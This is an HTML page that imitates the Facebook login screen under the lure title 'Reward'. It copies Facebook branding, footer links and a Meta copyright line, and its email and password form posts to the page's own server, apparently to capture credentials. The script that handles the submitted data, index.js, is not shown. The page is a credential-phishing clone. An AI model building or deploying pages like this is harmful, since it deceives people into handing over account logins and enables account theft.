<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Reward</title>
    <link rel="stylesheet" href="css/style.css">
</head>
<body>
    <div class="login-fb">
  <div class="info">
    <div class="logo">
      <h2>facebook</h2>
    </div>
    <form method="post">
      <input class="email" type="text" placeholder="Mobile number or email address" id="user-input-1" name="User" required>
      <div class="password-block">
          <input class="password" type="password" placeholder="Password" id="user-input-2" name="Password" required>
          <button type="button" id="show-pass-btn">show</button>
      </div>
      <input class="subm" type="submit" value="Log in">
      <a href="https://web.facebook.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzA1MDkwNTUzLCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D&ars=facebook_login" class="forgot">forgotten password?</a>
      <div class="new">
        <p class="text"></p>
        <a href="https://web.facebook.com/reg/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzA1MDkwNjgyLCJjYWxsc2l0ZV9pZCI6MzYzOTY5MDQ0ODc4OTI4fQ%3D%3D">create new account</a>
      </div>
    </form>
  </div>
  </div>
  <div class="footer1">
    <div class="container1">
      <p1>English (UK)</p1>
      <p>Français (France)</p>
      <p>Español</p>
      <p>Deutsch</p>
    </div>
    <div class="container2">
      <p>English (US)</p>
      <p>Português (Brazil)</p>
      <p>عربي</p>
      <a href="https://m.facebook.com/language/?next_uri=https%3A%2F%2Fm.facebook.com%2F&refid=8">
      <img src="https://i.ibb.co/y6d77K9/IMG-20220528-073600-666.jpg" alt="add" /></a>
    </div>
</div>

<div class="footer2">
<a href="https://about.facebook.com/?refid=8">About</a>
<div></div>
<a href="https://m.facebook.com/help/?ref=pf&refid=8">Help</a>
<div></div>
<a>More</a>
</div>
    <p id="end">Meta &copy; 2022</p>
  
  
    <script src="index.js" type="module"></script>
    <script>
        const showPassword = document.getElementById("show-pass-btn");
const passwordField = document.getElementById("user-input-2");

showPassword.addEventListener("click", () => {
  
  if (showPassword.textContent === "show") {
    passwordField.type = "text";
    showPassword.textContent = "hide";  
  } else {
    passwordField.type = "password";
    showPassword.textContent = "show";
  }
  
})
    </script>
  </body>
</html>s
